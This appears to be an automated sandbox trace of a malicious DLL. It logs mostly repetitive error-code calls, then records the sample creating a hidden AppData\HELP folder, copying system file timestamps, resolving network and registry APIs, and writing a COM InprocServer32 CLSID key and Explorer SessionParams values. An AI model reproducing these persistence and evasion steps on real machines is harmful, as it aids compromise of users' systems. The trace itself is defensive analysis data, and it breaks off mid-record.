[0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.780] SetLastError (dwErrCode=0x0) [0034.780] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.781] SetLastError (dwErrCode=0x0) [0034.781] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.782] SetLastError (dwErrCode=0x0) [0034.782] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.783] SetLastError (dwErrCode=0x0) [0034.783] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.784] SetLastError (dwErrCode=0x0) [0034.784] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.785] SetLastError (dwErrCode=0x0) [0034.785] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.786] GetLastError () returned 0x0 [0034.786] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.787] GetLastError () returned 0x0 [0034.787] SetLastError (dwErrCode=0x0) [0034.788] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.788] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.788] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f900 | out: lpSystemTimeAsFileTime=0x28f900*(dwLowDateTime=0xe26cc2b0, dwHighDateTime=0x1d3dfba)) [0034.789] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f838, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.789] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28f720, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.789] GetLastError () returned 0x0 [0034.790] GetLastError () returned 0x0 [0034.790] GetLastError () returned 0x0 [0034.790] GetLastError () returned 0x0 [0034.790] GetLastError () returned 0x0 [0034.790] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.790] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.790] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.790] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.790] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.790] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.790] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.790] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.790] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.790] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.790] GetLastError () returned 0xb7 [0034.790] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.790] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.790] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.790] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.790] wsprintfA (in: param_1=0x28f5a0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.791] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.791] wsprintfA (in: param_1=0x28f49c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.791] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.791] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.791] CloseHandle (hObject=0x74) returned 1 [0034.791] GetLastError () returned 0x0 [0034.791] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.791] GetLastError () returned 0x0 [0034.791] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.791] GetSystemDirectoryA (in: lpBuffer=0x28f5a0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.791] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.791] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.791] CloseHandle (hObject=0x74) returned 1 [0034.791] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.791] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.792] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.793] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.793] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.793] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.793] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.793] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.793] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.793] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.793] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.793] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.793] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.794] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.795] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.795] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.795] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.795] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.795] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.795] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.796] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.796] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.796] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.796] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.796] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.796] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.796] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.796] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.796] GetVersionExW (in: lpVersionInformation=0x28fb24*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28fb24*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0034.796] GetLastError () returned 0x7f [0034.796] SetLastError (dwErrCode=0x7f) [0034.796] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x28f818, lpdwDisposition=0x0 | out: phkResult=0x28f818*=0x7c, lpdwDisposition=0x0) returned 0x0 [0034.796] RegSetValueExW (in: hKey=0x7c, lpValueName=0x0, Reserved=0x0, dwType=0x1, lpData="127.0.0.1", cbData=0x14 | out: lpData="127.0.0.1") returned 0x0 [0034.796] GetLastError () returned 0x7f [0034.796] GetLastError () returned 0x7f [0034.797] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x28f924, lpdwDisposition=0x28fa80 | out: phkResult=0x28f924*=0x80, lpdwDisposition=0x28fa80*=0x2) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x28f928*=0xe10, cbData=0x4 | out: lpData=0x28f928*=0xe10) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x28f928*=0x1, cbData=0x4 | out: lpData=0x28f928*=0x1) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x72ee31d4*, cbData=0x2 | out: lpData=0x72ee31d4*) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="Plgv", Reserved=0x0, dwType=0x3, lpData=0x28f9cc*, cbData=0x58 | out: lpData=0x28f9cc*) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="Plpv", Reserved=0x0, dwType=0x3, lpData=0x28fa24*, cbData=0x5c | out: lpData=0x28fa24*) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="ISFValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0034.797] RegSetValueExA (in: hKey=0x80, lpValueName="ISRValue", Reserved=0x0, dwType=0x3, lpData=0x72ee313f*, cbData=0x0 | out: lpData=0x72ee313f*) returned 0x0 [0034.797] RegCloseKey (hKey=0x80) returned 0x0 [0034.798] HeapDestroy (hHeap=0x6b0000) returned 1 Process: id = "50" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xcd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2216 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2217 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2218 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2219 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2220 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2221 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2222 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2223 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2224 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2225 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2226 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2227 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 